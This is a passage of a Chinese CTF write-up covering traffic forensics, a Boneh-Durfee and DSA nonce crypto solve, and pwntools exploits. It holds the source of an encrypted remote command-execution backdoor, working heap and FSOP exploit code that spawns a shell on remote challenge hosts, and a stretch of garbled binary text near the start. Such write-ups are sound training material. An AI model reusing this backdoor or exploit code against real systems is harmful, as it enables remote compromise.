pIGluIHJhbmdlKGxlbihkYXRhKSk6CiAgICAgICAgZGF0YVtpXSA9IGNocihvcmQoZGF0YVtpXSkgXiBrZXkxW2kgJSA0XSkKICAgIGRhdGEgPSAnJy5qb2luKGRhdGEpCiAgICByZXR1cm4gZGF0YQoKCmRlZiBkZWNyeXB0KGRhdGEsIGtleSk6CiAgICBkYXRhID0gdDEoZGF0YSkKICAgIGRhdGEgPSByYzRfZGVjcnlwdChkYXRhLCBrZXkpCiAgICByZXR1cm4gZGF0YQoKCmRlZiBlbmNyeXB0KGRhdGEsIGtleSk6CiAgICBkYXRhID0gcmM0X2VuY3J5cHQoZGF0YSwga2V5KQogICAgZGF0YSA9IHQxKGRhdGEpCgogICAgcmV0dXJuIGRhdGEKCgpkZWYgc3lzdGVtKGNtZCk6CiAgICByZXMgPSBvcy5wb3BlbihjbWQpLnJlYWQoKQogICAgcmV0dXJuIHJlcyBpZiByZXMgZWxzZSAiTm9uZVJlc3VsdCIKCgpkZWYgbWFpbigpOgogICAgaXAgPSAnMTkyLjE2OC4zMS40MicKICAgIHBvcnQgPSA4ODk5CiAgICBzb2NrZXRfc2VydmVyID0gc29ja2V0LnNvY2tldChmYW1pbHk9c29ja2V0LkFGX0lORVQsIHR5cGU9c29ja2V0LlNPQ0tfU1RSRUFNKQogICAgc29ja2V0X3NlcnZlci5iaW5kKChpcCwgcG9ydCkpCiAgICBzb2NrZXRfc2VydmVyLmxpc3RlbigxKQogICAgd2hpbGUgVHJ1ZToKICAgICAgICBjb25uLCBhZGRyID0gc29ja2V0X3NlcnZlci5hY2NlcHQoKQogICAgICAgIHdpdGggY29ubjoKICAgICAgICAgICAgcHJpbnQoImNvbm5lY3Q6OiIsIGFkZHIpCiAgICAgICAgICAgIHRyeToKICAgICAgICAgICAgICAgIHdoaWxlIFRydWU6CiAgICAgICAgICAgICAgICAgICAgZGF0YSA9IGNvbm4ucmVjdigxMDI0MDApCiAgICAgICAgICAgICAgICAgICAgIyBwcmludCgic2VydmVyIHJlY2V2aWUgcGVlcm5hbWUgYW5kIGRhdGE6IiwgY29ubi5nZXRwZWVybmFtZSgpLCBkYXRhLmRlY29kZSgpKQogICAgICAgICAgICAgICAgICAgIGlmIGRhdGE6CiAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEgPSBkYXRhLmRlY29kZSgpCiAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEgPSBkZWNyeXB0KGRhdGEsIGtleSkKICAgICAgICAgICAgICAgICAgICAgICAgZGF0YSA9IGpzb24ubG9hZHMoZGF0YSkKICAgICAgICAgICAgICAgICAgICAgICAgaWYgZGF0YVsib3Bjb2RlIl0gPT0gInNoZWxsIjoKICAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50KCJzaGVsbENNRDo6IiwgZGF0YVsibXNnIl0pCiAgICAgICAgICAgICAgICAgICAgICAgICAgICByZXMgPSBzeXN0ZW0oZGF0YVsibXNnIl0pCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCgicmVzOjoiLCByZXMpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25uLnNlbmRhbGwoZW5jcnlwdChyZXMsIGtleSkuZW5jb2RlKCkpCiAgICAgICAgICAgICAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWsKICAgICAgICAgICAgZXhjZXB0IENvbm5lY3Rpb25SZXNldEVycm9yIGFzIGU6CiAgICAgICAgICAgICAgICBwcmludCgi6L+c56iL6L+e5o6l5pat5byAIikKCgppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOgogICAgbWFpbigpCg==
ã.5Óf.×.÷'B.6ö6¶W@¦g&öÒ.7'..Fòä6...W"..×.÷'B..$3@¦.×.÷'B.&.6Sc@¦.×.÷'B.÷0¦.×.÷'B.§6öà¦.×.÷'B...6.Æ. ¦FVb.6.Æ7VÆ.FUöÖCR.7G&.ær. ¢....ÖCUö..6..Ò...6.Æ."æÖCR..¢....ÖCUö..6.çW.F.FR.7G&.æræVæ6öFR.wWFbÓ.r..¢....ÖCUö.W..Ò.ÖCUö..6.æ.W.F.vW7B..¢....&WGW&â.ÖCUö.W. ¦g&öÒ.7'..Fòä6...W"..×.÷'B..$3@¦.×.÷'B.&.6Sc@¦.×.÷'B.§6öà §v.F..÷.Vâ."â÷367&UBçG.B"Â.'""...2.c ¢....¶W..Ò.bç&V.B..¦¶W..Ò.6.Æ7VÆ.FUöÖCR.¶W.. ¦FVb.&3EöVæ7'..B.F.F.Â.¶W... ¢....¶W..Ò.'.FW2.¶W..Â.Væ6öF.æsÒwWFbÓ.r.¢....Væ2.Ò..$3BææWr.¶W..¢....&W2.Ò.Væ2æVæ7'..B.F.F.æVæ6öFR.wWFbÓ.r..¢....&W2.Ò.&.6ScBæ#cFVæ6öFR.&W2.¢....&W2.Ò.7G".&W2Â.wWFbÓ.r.¢....&WGW&â.&W0 ¦FVb.&3EöFV7'..B.F.F.Â.¶W... ¢....F.F..Ò.&.6ScBæ#cFFV6öFR.F.F..¢....¶W..Ò.'.FW2.¶W..Â.Væ6öF.æsÒwWFbÓ.r.¢....Væ2.Ò..$3BææWr.¶W..¢....&W2.Ò.Væ2æFV7'..B.F.F..¢....&W2.Ò.7G".&W2Â.vv&²rÂ.W'&÷'3Òv.væ÷&Rr.¢....&WGW&â.&W0 ¦FVb.C..F.F.. ¢.....×.÷'B.&P¢....g&öÒ.F.FWF.ÖR..×.÷'B.F.FWF.ÖRÂ.F.ÖVFVÇF.¢....7W'&VçE÷F.ÖR.Ò.F.FWF.ÖRææ÷r..¢....F.&vWE÷F.ÖR.Ò.7W'&VçE÷F.ÖRç&W.Æ.6R.6V6öæCÓ.Â.Ö.7&÷6V6öæCÓ..¢....F.ÖW7F.×..Ò..çB.F.&vWE÷F.ÖRçF.ÖW7F.×....¢....¶W...Ò..W..F.ÖW7F.×..³#¥Òç¦f.ÆÂ...¢....¶W...Ò.&Ræf.æF.ÆÂ."rç³'ÒrÂ.¶W...¢....¶W...Ò.¶.çB..Â..b..f÷"....â.¶W..Т....F.F..Ò.Æ.7B.F.F..¢....f÷"....â.&.ævR.ÆVâ.F.F... ¢........F.F.¶.Ò.Ò.6.".÷&B.F.F.¶.Ò..â.¶W..¶..R.EÒ.¢....F.F..Ò.rræ¦ö.â.F.F..¢....&WGW&â.F.F. ¦FVb.FV7'..B.F.F.Â.¶W.. ¢....F.F..Ò.C..F.F..¢....F.F..Ò.&3EöFV7'..B.F.F.Â.¶W..¢....&WGW&â.F.F. ¦FVb.Væ7'..B.F.F.Â.¶W.. ¢....F.F..Ò.&3EöVæ7'..B.F.F.Â.¶W..¢....F.F..Ò.C..F.F.. ¢....&WGW&â.F.F. ¦FVb.7.7FVÒ.6ÖB. ¢....&W2.Ò.÷2ç.÷.Vâ.6ÖB.ç&V.B..¢....&WGW&â.&W2..b.&W2.VÇ6R.$æöæU&W7VÇB ¦FVb.Ö..â.. ¢.......Ò.s.."ã.c.ã3.ãC"p¢.....÷'B.Ò.....¢....6ö6¶WE÷6W'fW".Ò.6ö6¶WBç6ö6¶WB.f.Ö.Ç.×6ö6¶WBä.eô.äUBÂ.G..S×6ö6¶WBå4ô4µõ5E$T.Ò.¢....6ö6¶WE÷6W'fW"æ&.æB....Â..÷'B..¢....6ö6¶WE÷6W'fW"æÆ.7FVâ...¢....v..ÆR.G'VS ¢........6öæâÂ..FG".Ò.6ö6¶WE÷6W'fW"æ.66W.B..¢........v.F..6öæã ¢.............&.çB.&6öææV7C£¢"Â..FG".¢............G'. ¢................v..ÆR.G'VS ¢....................F.F..Ò.6öæâç&V7b...#C...¢....................2..&.çB.'6W'fW".&V6Wf.R..VW&æ.ÖR..æB.F.F.¢"Â.6öæâævWG.VW&æ.ÖR..Â.F.F.æFV6öFR...¢.....................b.F.F. ¢........................F.F..Ò.F.F.æFV6öFR..¢........................F.F..Ò.FV7'..B.F.F.Â.¶W..¢........................F.F..Ò.§6öâæÆö.G2.F.F..¢.........................b.F.F.²&÷.6öFR%Ò.ÓÒ.'6.VÆÂ# ¢.............................&.çB.'6.VÆÄ4ÔC£¢"Â.F.F.²&×6r%Ò.¢............................&W2.Ò.7.7FVÒ.F.F.²&×6r%Ò.¢.............................&.çB.'&W3£¢"Â.&W2.¢............................6öæâç6VæF.ÆÂ.Væ7'..B.&W2Â.¶W..æVæ6öFR...¢....................VÇ6S ¢........................'&V.°¢............W.6W.B.6öææV7F.öå&W6WDW'&÷"..2.S ¢.................&.çB...s.¢/¢Þæ.¥æ..å¼.")
if __name__ == '__main__':
main()
这里应该就是修改server.py的文件内容了,但是上面报错,没解决,本来应该很快解出来的重点就是卡在这里了
前面的流追踪完了,后面也就没啥可看的了,后面也就还能追踪到一个flag.txt,但是只能dir命令执行后发现有flag.txt没有查看文件内容,所以当时我疑惑了很久
后来我通过wireshark的统计功能,发现了一个9999端口,结合上面追踪时发现的运行脚本报错
很明显端口是改成了9999,接下来,我们好好审计一下server.py里面的内容
import socket
from Crypto.Cipher import ARC4
import base64
import os
import json
import hashlib
def calculate_md5(string):
md5_hash = hashlib.md5()
md5_hash.update(string.encode('utf-8'))
md5_hex = md5_hash.hexdigest()
return md5_hex
from Crypto.Cipher import ARC4
import base64
import json
#这个是读取s3creT.txt的内容进行md5加密,然后作为key使用
#这里面的内容,我已经通过上面的追踪流找到
with open("./s3creT.txt", "r") as f:
key = f.read()
key = calculate_md5(key)
def rc4_encrypt(data, key1):
key = bytes(key1, encoding='utf-8')
enc = ARC4.new(key)
res = enc.encrypt(data.encode('utf-8'))
res = base64.b64encode(res)
res = str(res, 'utf-8')
return res
def rc4_decrypt(data, key1):
data = base64.b64decode(data)
key = bytes(key1, encoding='utf-8')
enc = ARC4.new(key)
res = enc.decrypt(data)
res = str(res, 'gbk', errors='ignore')
return res
def t1(data):
#这个函数实现了一种简单的加密算法,通过对输入数据进行异或运算,使用基于当前时间的动态密钥来加密或解密数据
import re
from datetime import datetime, timedelta
current_time = datetime.now()
target_time = current_time.replace(second=0, microsecond=0)
timestamp = int(target_time.timestamp())
key1 = hex(timestamp)[2:].zfill(8)
key1 = re.findall(r'.{2}', key1)
key1 = [int(i, 16) for i in key1]
data = list(data)
for i in range(len(data)):
data[i] = chr(ord(data[i]) ^ key1[i % 4])
data = ''.join(data)
return data
def decrypt(data, key):
data = t1(data)
data = rc4_decrypt(data, key)
return data
def encrypt(data, key):
data = rc4_encrypt(data, key)
data = t1(data)
return data
def system(cmd):
res = os.popen(cmd).read()
return res if res else "NoneResult"
def main():
#这里就是连接上端口做了一些操作
ip = '192.168.31.42'
port = 8899
socket_server = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
socket_server.bind((ip, port))
socket_server.listen(1)
while True:
conn, addr = socket_server.accept()
with conn:
print("connect::", addr)
try:
while True:
data = conn.recv(102400)
# print("server recevie peername and data:", conn.getpeername(), data.decode())
if data:
#这里是主要的解密命令执行的结果
data = data.decode()
data = decrypt(data, key)
data = json.loads(data)
if data["opcode"] == "shell":
print("shellCMD::", data["msg"])
res = system(data["msg"])
print("res::", res)
conn.sendall(encrypt(res, key).encode())
else:
break
except ConnectionResetError as e:
print("远程连接断开")
if __name__ == '__main__':
main()
修改后的脚本内容如下
import socket
from Crypto.Cipher import ARC4
import base64
import os
import json
import hashlib
def calculate_md5(string):
md5_hash = hashlib.md5()
md5_hash.update(string.encode('utf-8'))
md5_hex = md5_hash.hexdigest()
return md5_hex
from Crypto.Cipher import ARC4
import base64
import json
with open("s3creT.txt", "r") as f:
key = f.read()
key = calculate_md5(key)
def rc4_encrypt(data, key1):
key = bytes(key1, encoding='utf-8')
enc = ARC4.new(key)
res = enc.encrypt(data.encode('utf-8'))
res = base64.b64encode(res)
res = str(res, 'utf-8')
return res
def rc4_decrypt(data, key1):
print(data)
data = base64.b64decode(data)
key = bytes(key1, encoding='utf-8')
enc = ARC4.new(key)
res = enc.decrypt(data)
res = str(res, 'gbk', errors='ignore')
return res
def t1(data):
import re
from datetime import datetime, timedelta
current_time = datetime.now()
target_time = current_time.replace(second=0, microsecond=0)
# for i in range(1705562720,1705562860):
timestamp = 1705562760
print(timestamp)
key1 = hex(timestamp)[2:].zfill(8)
key1 = re.findall(r'.{2}', key1)
key1 = [int(i, 16) for i in key1]
data = list(data)
for i in range(len(data)):
data[i] = chr(ord(data[i]) ^ key1[i % 4])
data = ''.join(data)
return data
def decrypt(data, key):
data = t1(data)
data = rc4_decrypt(data, key)
return data
def encrypt(data, key):
data = rc4_encrypt(data, key)
data = t1(data)
return data
def system(cmd):
res = os.popen(cmd).read()
return res if res else "NoneResult"
def main():
hex_string = "16c3b2c295c3be04c29cc29fc3a90cc39ec2a3c39937c391c3a7c3811cc38bc3a0c39b29c29ac2b1c3b830c3b2c286c3a13cc38ac296c38d13c3a2c29dc3920bc3bac2a8c2bb22c29bc287c3a328c3afc29cc3bd27c390c3a6c38110c381c2a5c381"
byte_list = bytes.fromhex(hex_string)
decoded_string = byte_list.decode('utf-8')
data = decoded_string
data = decrypt(data, key)
print(data)
if __name__ == '__main__':
main()
时间戳根据提示可以获得,但是正确的时间戳不在数据包里,需要爆破从1705562720-1705562860
这是时间戳的位置
然后再将9999端口的十六进制拿出来一个一个解,确定
16c3b2c295c3be04c29cc29fc3a90cc39ec2a3c39937c391c3a7c3811cc38bc3a0c39b29c29ac2b1c3b830c3b2c286c3a13cc38ac296c38d13c3a2c29dc3920bc3bac2a8c2bb22c29bc287c3a328c3afc29cc3bd27c390c3a6c38110c381c2a5c381
为flag
[Running] python -u "d:\GoogleDownLoad\lesuo_5e946a7fabb9595ff150c65eb09df597\server.py"
1705562760
sZGva4MaivqQRy5Iyc2SL2cpUZTiYbDEvJOZnRz3G3UkMGNuBx4IuiwI
flag{3741b40e-3185-4a9a-80a6-83403e4942fc}
这最后一步是真浪费时间,一个一个手测。。。。
可信计算
基于挑战码的双向认证1
第十五届CISCN
https://blog.csdn.net/qq_41315957/article/details/125037257
还是一样的非预期,哈哈哈哈
grep -ri “flag”
基于挑战码的双向认证2
这题就不用写了吧
Crypto
not_wiener
题目源码
from Crypto.Util.number import *
from gmpy2 import *
import random, os
from hashlib import sha1
from random import randrange
flag=b''
x = bytes_to_long(flag)
def gen_key():
while True:
q = getPrime(160)
p = 2 * getPrime(1024-160) * q+1
if isPrime(p):
break
h = random.randint(1, p - 1)
g = powmod(h,(p-1)//q, p)
y=pow(g,x,p)
return p,q,g,y
def cry():
a =
p = getPrime(512)
q = getPrime(512)
d = getPrime(280)
n = p * q
e = inverse(d, (p - 1) * (q - 1))
c = pow(a, e, n)
return n,e,c
p,q,g,y=gen_key()
k1 = random.randint(1, q-1)
h1 = bytes_to_long(sha1(os.urandom(20)).digest())
r1 = pow(g, k1, p) % q
s1 = ((h1 + x*r1) * invert(k1, q))% q
n,e,c= cry()
a=
b= 17474742587088593627
k2 = a*k1 + b
h2 = bytes_to_long(sha1(os.urandom(20)).digest())
r2 = pow(g, k2, p) % q
s2 = ((h2 + x*r2) * invert(k2, q)) % q
print(n,e,c)
print(p,q,g,y)
print("h1:%s r1:%s s1:%s"%(h1,r1,s1))
print("h2:%s r2:%s s2:%s"%(h2,r2,s2))
.txt
n = 98871082998654651904594468693622517613869880791884929588100914778964766348914919202255397776583412976785216592924335179128220634848871563960167726280836726035489482233158897362166942091133366827965811201438682117312550600943385153640907629347663140487841016782054145413246763816202055243693289693996466579973
e = 76794907644383980853714814867502708655721653834095293468287239735547303515225813724998992623067007382800348003887194379223500764768679311862929538017193078946067634221782978912767213553254272722105803768005680182504500278005295062173004098796746439445343896868825218704046110925243884449608326413259156482881
c = 13847199761503953970544410090850216804358289955503229676987212195445226107828814170983735135692611175621170777484117542057117607579344112008580933900051471041224296342157618857321522682033260246480258856376097987259016643294843196752685340912823459403703609796624411954082410762846356541101561523204985391564
p= 161310487790785086482919800040790794252181955976860261806376528825054571226885460699399582301663712128659872558133023114896223014064381772944582265101778076462675402208451386747128794418362648706087358197370036248544508513485401475977401111270352593919906650855268709958151310928767086591887892397722958234379
q= 1115861146902610160756777713087325311747309309771
g= 61073566757714587321114447684333928353300944355112378054603585955730395524359123615359185275743626350773632555967063692889668342544616165017003197599818881844811647270423070958521148291118914198811187731689123176313367399492561288350530256722898205674043032421874788802819858438796795768177550638273020791962
y= 23678147495254433946472657196764372220306841739888385605070426528738230369489739339976134564575544246606937803367113623097260181789372915552172469427842482448570540429192377881186772226796452797182435452490307834205012154495575570994963829345053331967442452842152258650027916313982835119514473311305158299360
(h1, r1, s1) = 535874494834828755542711401117152397489711233142, 117859946800380767356190121030392492081340616512, 26966646740134065096660259687229179143947213779
(h2, r2, s2) = 236574518096866758760287021848258048065293279716, 863199000523521111517835459866422731857447792677, 517924607931342012033031470185302567344725962419
主要公式,函数
def gen_key():
while True:
q = getPrime(160)
p = 2 * getPrime(1024-160) * q+1
if isPrime(p):
break
h = random.randint(1, p - 1)
g = powmod(h,(p-1)//q, p)
y=pow(g,x,p)
return p,q,g,y
def cry():
a =
p = getPrime(512)
q = getPrime(512)
d = getPrime(280)
n = p * q
e = inverse(d, (p - 1) * (q - 1))
c = pow(a, e, n)
return n,e,c
再结合题目名,与Wiener’s Attack相似的是Boneh and Durfee attack
条件:
通过网上相应的模板https://www.bilibili.com/read/cv13781056/,修改一下
求出a
from Crypto.Util.number import *
N = 98871082998654651904594468693622517613869880791884929588100914778964766348914919202255397776583412976785216592924335179128220634848871563960167726280836726035489482233158897362166942091133366827965811201438682117312550600943385153640907629347663140487841016782054145413246763816202055243693289693996466579973
e = 76794907644383980853714814867502708655721653834095293468287239735547303515225813724998992623067007382800348003887194379223500764768679311862929538017193078946067634221782978912767213553254272722105803768005680182504500278005295062173004098796746439445343896868825218704046110925243884449608326413259156482881
c = 13847199761503953970544410090850216804358289955503229676987212195445226107828814170983735135692611175621170777484117542057117607579344112008580933900051471041224296342157618857321522682033260246480258856376097987259016643294843196752685340912823459403703609796624411954082410762846356541101561523204985391564
"""
Setting debug to true will display more informations
about the lattice, the bounds, the vectors...
"""
debug = False
"""
Setting strict to true will stop the algorithm (and
return (-1, -1)) if we don't have a correct
upperbound on the determinant. Note that this
doesn't necesseraly mean that no solutions
will be found since the theoretical upperbound is
usualy far away from actual results. That is why
you should probably use `strict = False`
"""
strict = False
"""
This is experimental, but has provided remarkable results
so far. It tries to reduce the lattice as much as it can
while keeping its efficiency. I see no reason not to use
this option, but if things don't work, you should try
disabling it
"""
helpful_only = True
dimension_min = 7 # stop removing if lattice reaches that dimension
############################################
# Functions
##########################################
# display stats on helpful vectors
def helpful_vectors(BB, modulus):
nothelpful = 0
for ii in range(BB.dimensions()[0]):
if BB[ii, ii] >= modulus:
nothelpful += 1
print(nothelpful, "/", BB.dimensions()[0], " vectors are not helpful")
# display matrix picture with 0 and X
def matrix_overview(BB, bound):
for ii in range(BB.dimensions()[0]):
a = ('%02d ' % ii)
for jj in range(BB.dimensions()[1]):
a += '0' if BB[ii, jj] == 0 else 'X'
if BB.dimensions()[0] < 60:
a += ' '
if BB[ii, ii] >= bound:
a += '~'
print(a)
# tries to remove unhelpful vectors
# we start at current = n-1 (last vector)
def remove_unhelpful(BB, monomials, bound, current):
# end of our recursive function
if current == -1 or BB.dimensions()[0] <= dimension_min:
return BB
# we start by checking from the end
for ii in range(current, -1, -1):
# if it is unhelpful:
if BB[ii, ii] >= bound:
affected_vectors = 0
affected_vector_index = 0
# let's check if it affects other vectors
for jj in range(ii + 1, BB.dimensions()[0]):
# if another vector is affected:
# we increase the count
if BB[jj, ii] != 0:
affected_vectors += 1
affected_vector_index = jj
# level:0
# if no other vectors end up affected
# we remove it
if affected_vectors == 0:
# print("* removing unhelpful vector", ii)
BB = BB.delete_columns([ii])
BB = BB.delete_rows([ii])
monomials.pop(ii)
BB = remove_unhelpful(BB, monomials, bound, ii - 1)
return BB
# level:1
# if just one was affected we check
# if it is affecting someone else
elif affected_vectors == 1:
affected_deeper = True
for kk in range(affected_vector_index + 1, BB.dimensions()[0]):
# if it is affecting even one vector
# we give up on this one
if BB[kk, affected_vector_index] != 0:
affected_deeper = False
# remove both it if no other vector was affected and
# this helpful vector is not helpful enough
# compared to our unhelpful one
if affected_deeper and abs(bound - BB[affected_vector_index, affected_vector_index]) < abs(
bound - BB[ii, ii]):
# print("* removing unhelpful vectors", ii, "and", affected_vector_index)
BB = BB.delete_columns([affected_vector_index, ii])
BB = BB.delete_rows([affected_vector_index, ii])
monomials.pop(affected_vector_index)
monomials.pop(ii)
BB = remove_unhelpful(BB, monomials, bound, ii - 1)
return BB
# nothing happened
return BB
"""
Returns:
* 0,0 if it fails
* -1,-1 if `strict=true`, and determinant doesn't bound
* x0,y0 the solutions of `pol`
"""
def boneh_durfee(pol, modulus, mm, tt, XX, YY):
"""
Boneh and Durfee revisited by Herrmann and May
finds a solution if:
* d < N^delta
* |x| < e^delta
* |y| < e^0.5
whenever delta < 1 - sqrt(2)/2 ~ 0.292
"""
# substitution (Herrman and May)
PR.<u,x,y> = PolynomialRing(ZZ)
Q = PR.quotient(x * y + 1 - u) # u = xy + 1
polZ = Q(pol).lift()
UU = XX * YY + 1
# x-shifts
gg = []
for kk in range(mm + 1):
for ii in range(mm - kk + 1):
xshift = x ^ ii * modulus ^ (mm - kk) * polZ(u, x, y) ^ kk
gg.append(xshift)
gg.sort()
# x-shifts list of monomials
monomials = []
for polynomial in gg:
for monomial in polynomial.monomials():
if monomial not in monomials:
monomials.append(monomial)
monomials.sort()
# y-shifts (selected by Herrman and May)
for jj in range(1, tt + 1):
for kk in range(floor(mm / tt) * jj, mm + 1):
yshift = y ^ jj * polZ(u, x, y) ^ kk * modulus ^ (mm - kk)
yshift = Q(yshift).lift()
gg.append(yshift) # substitution
# y-shifts list of monomials
for jj in range(1, tt + 1):
for kk in range(floor(mm / tt) * jj, mm + 1):
monomials.append(u ^ kk * y ^ jj)
# construct lattice B
nn = len(monomials)
BB = Matrix(ZZ, nn)
for ii in range(nn):
BB[ii, 0] = gg[ii](0, 0, 0)
for jj in range(1, ii + 1):
if monomials[jj] in gg[ii].monomials():
BB[ii, jj] = gg[ii].monomial_coefficient(monomials[jj]) * monomials[jj](UU, XX, YY)
# Prototype to reduce the lattice
if helpful_only:
# automatically remove
BB = remove_unhelpful(BB, monomials, modulus ^ mm, nn - 1)
# reset dimension
nn = BB.dimensions()[0]
if nn == 0:
print("failure")
return 0, 0
# check if vectors are helpful
if debug:
helpful_vectors(BB, modulus ^ mm)
# check if determinant is correctly bounded
det = BB.det()
bound = modulus ^ (mm * nn)
if det >= bound:
# print("We do not have det < bound. Solutions might not be found.")
# print("Try with highers m and t.")
if debug:
diff = (log(det) - log(bound)) / log(2)
# print("size det(L) - size e^(m*n) = ", floor(diff))
if strict:
return -1, -1
else:
print("det(L) < e^(m*n) (good! If a solution exists < N^delta, it will be found)")
# display the lattice basis
if debug:
matrix_overview(BB, modulus ^ mm)
# LLL
if debug:
print("optimizing basis of the lattice via LLL, this can take a long time")
BB = BB.LLL()
if debug:
print("LLL is done!")
# transform vector i & j -> polynomials 1 & 2
if debug:
print("looking for independent vectors in the lattice")
found_polynomials = False
for pol1_idx in range(nn - 1):
for pol2_idx in range(pol1_idx + 1, nn):
# for i and j, create the two polynomials
PR.<w,z> = PolynomialRing(ZZ)
pol1 = pol2 = 0
for jj in range(nn):
pol1 += monomials[jj](w * z + 1, w, z) * BB[pol1_idx, jj] / monomials[jj](UU, XX, YY)
pol2 += monomials[jj](w * z + 1, w, z) * BB[pol2_idx, jj] / monomials[jj](UU, XX, YY)
# resultant
PR.<q> = PolynomialRing(ZZ)
rr = pol1.resultant(pol2)
# are these good polynomials?
if rr.is_zero() or rr.monomials() == [1]:
continue
else:
# print("found them, using vectors", pol1_idx, "and", pol2_idx)
found_polynomials = True
break
if found_polynomials:
break
if not found_polynomials:
# print("no independant vectors could be found. This should very rarely happen...")
return 0, 0
rr = rr(q, q)
# solutions
soly = rr.roots()
if len(soly) == 0:
# print("Your prediction (delta) is too small")
return 0, 0
soly = soly[0][0]
ss = pol1(q, soly)
solx = ss.roots()[0][0]
#
return solx, soly
delta = 0.271
lattice_size = 8
optimization_factor = int((1 - 2 * delta) * lattice_size)
X = 2 * floor(N ^ delta)
Y = floor(N ^ (1 / 2))
P.<x, y> = PolynomialRing(ZZ)
A = int((N + 1) / 2)
polynomial = 1 + x * (A + y)
solution_x, solution_y = boneh_durfee(polynomial, e, lattice_size, optimization_factor, X, Y)
d = int(polynomial(solution_x, solution_y) / e)
print(d)
m = power_mod(c, d, N)
a = 24601959430759983424400804734518943158892550216065342062971649989571838687333
from Crypto.Util.number import *
generator = 61073566757714587321114447684333928353300944355112378054603585955730395524359123615359185275743626350773632555967063692889668342544616165017003197599818881844811647270423070958521148291118914198811187731689123176313367399492561288350530256722898205674043032421874788802819858438796795768177550638273020791962
public_key_y = 23678147495254433946472657196764372220306841739888385605070426528738230369489739339976134564575544246606937803367113623097260181789372915552172469427842482448570540429192377881186772226796452797182435452490307834205012154495575570994963829345053331967442452842152258650027916313982835119514473311305158299360
(h1, r1, s1) = 535874494834828755542711401117152397489711233142, 117859946800380767356190121030392492081340616512, 26966646740134065096660259687229179143947213779
(h2, r2, s2) = 236574518096866758760287021848258048065293279716, 863199000523521111517835459866422731857447792677, 517924607931342012033031470185302567344725962419
prime_modulus = 161310487790785086482919800040790794252181955976860261806376528825054571226885460699399582301663712128659872558133023114896223014064381772944582265101778076462675402208451386747128794418362648706087358197370036248544508513485401475977401111270352593919906650855268709958151310928767086591887892397722958234379
subgroup_order = 1115861146902610160756777713087325311747309309771
private_key_a = 24601959430759983424400804734518943158892550216065342062971649989571838687333
private_key_b = 17474742587088593627
print(long_to_bytes((((h1 * r2 - h2 * r1 + private_key_b * s2 * r1) * inverse(s1 * r2 - private_key_a * s2 * r1, subgroup_order) % subgroup_order) * s1 - h1) * inverse(r1, subgroup_order) % subgroup_order))
pwn
book
exp
from pwn import *
binary = './pwn'
libelf = './libc.so.6'
#io = process(binary)
io = remote('8.147.131.183', 32760)
libc = ELF(libelf)
def add(idx,size):
io.recvuntil('> ')
io.sendline('1')
io.recvuntil(':')
io.sendline(str(idx))
io.recvuntil(':')
io.sendline(str(size))
def Del(idx):
io.recvuntil('> ')
io.sendline('2')
io.recvuntil(':')
io.sendline(str(idx))
def show(idx):
io.recvuntil('> ')
io.sendline('3')
io.recvuntil(':')
io.sendline(str(idx))
def edit(idx,text):
io.recvuntil('> ')
io.sendline('4')
io.recvuntil(':')
io.sendline(str(idx))
io.recvuntil(':')
io.sendline(text)
add(0,0x500)
add(1,0x100)
Del(0)
show(0)
x = u64(io.recv(6)+b'\x00'*2)
libc_base = x - 2202848
#print(libc_base)
#gdb.attach(io)
add(2,0x400)
add(3,0x400)
Del(2)
Del(3)
show(2)
key = u64(io.recv(5)+3*b'\x00')
heap_base = key << 12
print(hex(libc_base))
print(hex(heap_base))
_IO_list_all = libc_base + libc.sym['_IO_list_all']
_IO_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
setcontext = libc_base + libc.sym['setcontext']
pay = p64(_IO_list_all^key)+p64(0)
edit(3,pay)
add(4,0x400)
add(5,0x400)
edit(5,p64(heap_base + 2224))
# 网上的链子
mprotect = libc_base + libc.sym['mprotect']
setcontext = libc_base + libc.sym['setcontext']
RCE = setcontext + 61
libc_rop = ROP('./libc.so.6')
rax = libc_base + libc_rop.find_gadget(['pop rax','ret'])[0]
rdi = libc_base + libc_rop.find_gadget(['pop rdi','ret'])[0]
rsi = libc_base + libc_rop.find_gadget(['pop rsi','ret'])[0]
rdx = libc_base + libc_rop.find_gadget(['pop rdx','pop rbx','ret'])[0]
pop_5 = libc_base + libc_rop.find_gadget(['pop rbx','pop rbp','pop r12','pop r13','pop r14','ret'])[0]
fake_IO_addr = heap_base + 2224
fake_IO_FILE = p64(8)
fake_IO_FILE += p64(RCE) # call # setcontext + 61 # libc2.35
fake_IO_FILE += p64(0) +p64(1) # _IO_write_base # _IO_write_ptr
fake_IO_FILE += p64(fake_IO_addr) # fp->_IO_write_ptr
fake_IO_FILE += p64(rdi) + p64(heap_base) + p64(rsi) + p64(0x21000) + p64(rdx) + p64(7) # pop*5 to me
fake_IO_FILE += p64(fake_IO_addr+0xc0)
fake_IO_FILE += p64(mprotect) # 也可以 read
fake_IO_FILE += p64(fake_IO_addr + 248) # shellcode_addr
fake_IO_FILE = fake_IO_FILE.ljust(0x90,b'\x00')
fake_IO_FILE += p64(fake_IO_addr+0x10)
fake_IO_FILE += p64(pop_5) # setcontext Tow CALL #need pop * 5 ;ret
fake_IO_FILE = fake_IO_FILE.ljust(0xb0,b'\x00')
fake_IO_FILE += p64(1) # mode
fake_IO_FILE = fake_IO_FILE.ljust(0xc8,b'\x00')
fake_IO_FILE += p64(_IO_wfile_jumps + 0x30)
fake_IO_FILE = fake_IO_FILE.ljust(0xe0,b'\x00')
fake_IO_FILE += p64(fake_IO_addr)
fake_IO_FILE += asm(shellcraft.sh()) ## 根据实际情况看看需不需要
fake_IO_FILE += b'\n'
edit(4,fake_IO_FILE)
io.interactive()
nmanager
exp
from ctypes import *
from pwn import *
import time
binary = './nmanager'
io = remote('39.106.48.123',26282)
dl = CDLL('./libc.so.6')
dl.srand(int(time.time()))
c = list('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ')
c = c[dl.rand() % 62]
io.sendline(str(c))
def exploit(idx,ar,nl,name):
io.recvuntil('modify')
io.sendline(str(idx))
io.recvuntil('gender: ')
io.send(ar)
io.recvuntil('age: ')
io.sendline(p64(nl))
io.recvuntil('name: ')
io.send(name)
